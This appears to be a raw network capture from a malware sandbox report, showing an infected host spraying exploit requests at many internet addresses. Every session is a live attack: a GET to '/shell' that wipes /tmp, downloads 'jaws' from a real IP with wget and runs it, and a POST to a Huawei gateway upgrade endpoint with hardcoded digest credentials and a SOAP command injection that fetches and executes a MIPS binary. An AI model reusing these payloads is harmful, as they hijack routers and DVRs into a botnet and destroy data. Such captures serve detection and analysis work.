                                                          Dec 3, 2024 23:16:49.446717024 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          96192.168.2.2360176193.206.198.7880
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.447333097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          97192.168.2.2344382135.89.3.4480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.448024035 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          98192.168.2.2343480156.113.104.22037215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.869828939 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          99192.168.2.2345386197.101.175.18737215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.870455980 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          100192.168.2.2335412197.99.145.037215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.982573986 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          101192.168.2.2344632156.133.165.11537215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.991482973 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          102192.168.2.234152613.3.191.5580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.054017067 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          103192.168.2.2341216160.108.6.24680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.054733992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          104192.168.2.2358364105.92.24.7280
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.055428982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          105192.168.2.234103053.125.178.18980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.056056023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          106192.168.2.2360208194.223.37.3080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.056701899 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          107192.168.2.2360312108.165.135.3980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.057352066 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          108192.168.2.233517641.171.44.19637215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.099833012 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          109192.168.2.2349248197.173.204.937215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.100534916 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          110192.168.2.235261441.238.72.22937215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.101233959 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          111192.168.2.2355748197.79.45.18237215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.101917982 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          112192.168.2.2352214197.168.254.20537215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.102586985 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
